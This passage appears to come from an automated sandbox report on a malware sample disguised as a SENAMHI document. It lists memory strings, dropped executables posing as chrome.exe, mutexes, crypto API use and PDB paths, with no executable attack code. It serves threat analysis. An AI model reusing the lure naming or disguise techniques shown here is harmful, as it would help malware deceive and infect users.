00000001.00000003.81056282933.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.1.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.79944286859.0000000005E45000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79950935060.0000000006150000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83516008280.000000000603B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80997267130.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81003280204.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81004430159.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81148238884.0000000006150000.00000040.00001000.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79945562253.0000000005E35000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79946624029.0000000005E18000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79941413846.0000000005E44000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81000903880.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81000650649.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79945466909.0000000005E27000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81003090471.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83516925103.00000000060CB000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83517655529.00000000061E8000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79946513603.0000000005E0A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.79944286859.0000000005E45000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79950935060.0000000006150000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83516008280.000000000603B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80997267130.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81003280204.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81004430159.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81148238884.0000000006150000.00000040.00001000.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79945562253.0000000005E35000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79946624029.0000000005E18000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79941413846.0000000005E44000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81000903880.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79941126369.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81000650649.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79945466909.0000000005E27000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81003090471.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83516925103.00000000060CB000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83517655529.00000000061E8000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79946513603.0000000005E0A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81012939877.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81010861865.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81007454020.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81014511114.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81010600849.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81013135435.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80997267130.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81003280204.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81004430159.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81000903880.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81000650649.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81003090471.0000000005E0A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061919496.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81056282933.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.1.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81012939877.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81010861865.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81007454020.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81014511114.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81010600849.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81013135435.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);/overflow%s%.3x+%.6x%s%.3x/internalleafcorruptedno such schema: %sSELECT 'sqlite_master' AS name, 1 AS rootpage, 'table' AS type UNION ALL SELECT name, rootpage, type FROM "%w".%s WHERE rootpage!=0 ORDER BY namedbstat2018-01-22 18:45:57 0c55d179733b46d8d0ba4d88e01a25e10677046ee3da1d5b1581e86726f2171d:
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeMutant created: \Sessions\1\BaseNamedObjects\776E9B90846C
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1033676:304:WilStaging_02
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1034132:304:WilStaging_02
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1034132:120:WilError_03
                      Source: Chrome[1].exe.1.dr, ????????????/?????.csCryptographic APIs: 'TransformFinalBlock'
                      Source: Chrome[1].exe.1.dr, ????????????/?????.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                      Source: wtqsCpda..exe.1.dr, ????????????/?????.csCryptographic APIs: 'TransformFinalBlock'
                      Source: wtqsCpda..exe.1.dr, ????????????/?????.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                      Source: chrome.exe.15.dr, ????????????/?????.csCryptographic APIs: 'TransformFinalBlock'
                      Source: chrome.exe.15.dr, ????????????/?????.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                      Source: 15.0.wtqsCpda..exe.540000.3.unpack, ????????????/?????.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 15.0.wtqsCpda..exe.540000.3.unpack, ????????????/?????.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: DocumentoSENAMHI20222103.exeStatic file information: File size 1320960 > 1048576
                      Source: DocumentoSENAMHI20222103.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x129400
                      Source: DocumentoSENAMHI20222103.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: DocumentoSENAMHI20222103.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: DocumentoSENAMHI20222103.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: DocumentoSENAMHI20222103.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: DocumentoSENAMHI20222103.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: DocumentoSENAMHI20222103.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: DocumentoSENAMHI20222103.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: DocumentoSENAMHI20222103.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: vcruntime140.i386.pdb source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515401149.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061919496.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81056282933.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: vcruntime140.i386.pdbGCTL source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515401149.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061919496.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81056282933.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80749812105.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80763490133.00000000064A3000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80754738208.000000000644A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80751294134.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747033580.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515571343.0000000005E6F000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80747271781.000000000643B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80778848841.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80756890980.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80741387008.0000000006411000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: msvcp140.i386.pdbGCTL source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80780346997.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83518836187.0000000006410000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80780142254.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80773395092.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80782629346.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80784310301.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80782812675.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, msvcp140.dll.1.dr
                      Source: Binary string: C:\Users\W7H64\Desktop\VCSamples-master\VC2010Samples\ATL\OLEDB\Consumer\MultiRead\no.pdb source: DocumentoSENAMHI20222103.exe
                      Source: Binary string: ]c:\borrar\EmptyDll\Release\EmptyDll.pdb source: chrome.exe, 00000012.00000003.82952810978.0000000003C7A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.83513493821.00000000053D0000.00000004.08000000.00040000.00000000.sdmp, chrome.exe, 00000012.00000002.83513636630.00000000053F0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: USB.pdb source: chrome.exe, 00000012.00000003.82952810978.0000000003C7A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.83513493821.00000000053D0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: c:\Users\N A P O L E O N\Desktop\IconLib\obj\Debug\IconLib.pdb source: chrome.exe, 00000012.00000003.82952810978.0000000003C7A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.83513493821.00000000053D0000.00000004.08000000.00040000.00000000.sdmp, chrome.exe, 00000012.00000002.83513636630.00000000053F0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: c:\Users\N A P O L E O N\Desktop\IconLib\obj\Debug\IconLib.pdbd source: chrome.exe, 00000012.00000003.82952810978.0000000003C7A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.83513493821.00000000053D0000.00000004.08000000.00040000.00000000.sdmp, chrome.exe, 00000012.00000002.83513636630.00000000053F0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: DocumentoSENAMHI20222103.exe, 00000001.00000003.79944286859.0000000005E45000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79950935060.0000000006150000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83516008280.000000000603B000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81148238884.0000000006150000.00000040.00001000.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79945562253.0000000005E35000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79946624029.0000000005E18000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79941413846.0000000005E44000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79941126369.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79945466909.0000000005E27000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83516925103.00000000060CB000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83517655529.00000000061E8000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79946513603.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81063438774.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061631920.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81063247218.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81065282469.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81061919496.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81056282933.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.1.dr
                      Source: Binary string: PIN.pdb source: chrome.exe, 00000012.00000003.82952810978.0000000003C7A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.83513636630.00000000053F0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: msvcp140.i386.pdb source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80780346997.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83518836187.0000000006410000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80780142254.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80773395092.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80782629346.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80784310301.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80782812675.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, msvcp140.dll.1.dr
                      Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\security\nss3.pdb source: DocumentoSENAMHI20222103.exe, 00000001.00000003.81029831720.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81028272449.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81023544899.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83503539466.0000000001504000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81027987212.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81029572816.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.81030566751.0000000005E59000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: c:\borrar\EmptyDll\Release\EmptyDll.pdb source: chrome.exe, 00000012.00000003.82952810978.0000000003C7A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.83513493821.00000000053D0000.00000004.08000000.00040000.00000000.sdmp, chrome.exe, 00000012.00000002.83513636630.00000000053F0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80770255250.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80768466561.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80766226813.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80778848841.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80765987792.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80760169574.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80768273960.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: wuser32.pdb source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83509823788.000000000515F000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83511925092.0000000005570000.00000040.00001000.00020000.00000000.sdmp
                      Source: Binary string: PIN.pdbX source: chrome.exe, 00000012.00000003.82952810978.0000000003C7A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000002.83513636630.00000000053F0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80770255250.0000000005E59000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80768466561.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80766226813.0000000005E58000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80875623841.0000000005EF0000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83515005180.0000000005E05000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80778848841.0000000006411000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83519503741.0000000006619000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80765987792.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80760169574.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.80768273960.0000000005E0A000.00000004.00000800.00020000.00000000.sdmp
